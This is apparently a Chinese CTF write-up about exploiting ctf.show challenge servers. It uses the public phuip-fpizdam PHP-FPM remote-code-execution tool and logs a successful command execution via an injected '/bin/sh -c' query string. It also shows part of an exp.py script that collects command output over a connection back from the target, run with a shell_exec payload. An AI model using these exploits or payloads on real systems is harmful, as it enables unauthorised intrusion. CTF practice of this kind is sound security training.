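# Fetch and build phuip-fpizdam from upstream.
# The clone is unpinned (whatever HEAD is at the time of the clone); pin a
# tag or commit if a reproducible build of the tool matters to you.
# The steps are chained with && so that a failed clone or cd does not leave
# the following `go` commands running in the wrong directory.
git clone https://github.com/neex/phuip-fpizdam.git \
  && cd phuip-fpizdam \
  && go get -v \
  && go build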
执行 go get -v && go build 会一直没反应，因为 Go 默认的 GOPROXY 是 proxy.golang.org，国内无法访问。执行命令换代理：go env -w GOPROXY=https://goproxy.cn,direct（末尾的 ,direct 表示代理不可用时直接拉取；换代理并不会跳过模块校验，go.sum / GOSUMDB 的校验和检查依然生效）。再次执行 go get -v && go build，最后使用：
# Run the built tool against the target.
# "地址" is a placeholder for the target's base URL (e.g. http://host:port);
# the path must end in /index.php, otherwise the tool does not work.
go run . '地址/index.php'
末尾的 index.php 必须要加。我在本地搭的环境用不了，拿 VPS 打了一下就能用了。
root@hcss-ecs-8320:~/phui/phuip-fpizdam# go run . "http://24f960ac-d8d8-45be-8ba0-f5bb12ba5cb1.challenge.ctf.show/index.php"
2023/09/17 20:37:46 Base status code is 200
2023/09/17 20:37:49 Status code 502 for qsl=1765, adding as a candidate
2023/09/17 20:37:50 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2023/09/17 20:38:10 Attack params found: --qsl 1760 --pisos 237 --skip-detect
2023/09/17 20:38:10 Trying to set "session.auto_start=0"...
2023/09/17 20:38:12 Detect() returned attack params: --qsl 1760 --pisos 237 --skip-detect <-- REMEMBER THIS
2023/09/17 20:38:12 Performing attack using php.ini settings...
2023/09/17 20:38:14 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2023/09/17 20:38:14 Trying to cleanup /tmp/a...
2023/09/17 20:38:14 Done!
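# Read one XML reply from the connected peer and print the command result.
# `conn` (the accepted socket) and `recv_xml()` are defined earlier in exp.py
# and are not shown here; `data` is assumed to be bytes (the regex below is a
# bytes pattern) — TODO confirm against recv_xml().
data = recv_xml(conn)
# NOTE(review): `data` comes straight from the remote peer and is printed
# unsanitised; a hostile peer can put arbitrary bytes (e.g. terminal escape
# sequences) in here.
print('[+] Recieve data: ' + data.decode())

# The command output is carried base64-encoded inside a CDATA section;
# anything else in the reply is ignored.
g = re.search(rb'<\!\[CDATA\[([a-z0-9=\./\+]+)\]\]>', data, re.I)
if not g:
    print('[-] No result...')
    sys.exit(0)

data = g.group(1)

try:
    print('[+] Result: ' + base64.b64decode(data).decode())
except (binascii.Error, UnicodeDecodeError):
    # binascii.Error: the payload is not valid base64.
    # UnicodeDecodeError: it decoded, but to bytes that are not UTF-8 text
    # (e.g. binary command output). The original only caught binascii.Error,
    # so the non-text case — the one the message describes — crashed with an
    # uncaught UnicodeDecodeError instead of printing this.
    print('[-] May be not string result...')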
部署一下尝试。注意 exp.py 会在本地 accept() 等待连接（见下面的回溯），所以运行 exp.py 的机器必须能被目标访问到；如果目标连不回来，就会像下面这样在 sk.accept() 处超时。
root@hcss-ecs-8320:~/test# python3 exp.py -t http://pwn.challenge.ctf.show:28100/ -c 'shell_exec("ls /");'
Traceback (most recent call last):
  File "/root/test/exp.py", line 65, in <module>
    conn, addr = sk.accept()
  File "/usr/lib/python3.10/socket.py", line 293, in accept
    fd, addr = self._accept()
TimeoutError: timed out